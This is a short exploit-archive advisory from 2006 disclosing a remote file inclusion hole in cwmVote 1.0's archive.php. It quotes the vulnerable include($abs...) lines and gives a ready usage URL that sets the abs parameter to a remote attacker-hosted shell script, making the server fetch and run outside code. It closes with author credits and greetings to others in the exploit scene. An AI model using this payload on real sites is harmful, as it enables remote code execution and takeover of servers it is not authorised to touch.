cwmVote 1.0 (archive.php) Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : cwmVote 1.0 (archive.php) Remote File Include Vulnerability
# Published : 2006-12-19
# Author : bd0rk
# Previous Title : PHPFanBase 2.x (protection.php) Remote File Include Vulnerability
# Next Title : cwmCounter 5.1.1 (statistic.php) Remote File Include Exploit

################################################################
#                                                              #
#            cwmVote 1.0 File Include Vulnerability            #
#                                                              #
# F0und3R: bd0rk || SOH-Crew                                   #
#                                                              #
# Website: www.soh-crew.it.tt                                  #
#                                                              #
# Download: http://explorer.cwm-design.de/dirs/41/cwmVote.rar  #
#                                                              #
################################################################

Vulnerable Code in archive.php


Code: include($abs."inc/functions.inc.php");
include($abs."inc/conf.mysql.inc.php");
include($abs."inc/conf.pw.inc.php");

Usage: http://[target]/[cwm_vote_path]/archive.php?abs=http://[Shellscript]

Greetings: TheJT, Lu7k, Kacper, nukedx, str0ke

# www.Syue.com [2006-12-19]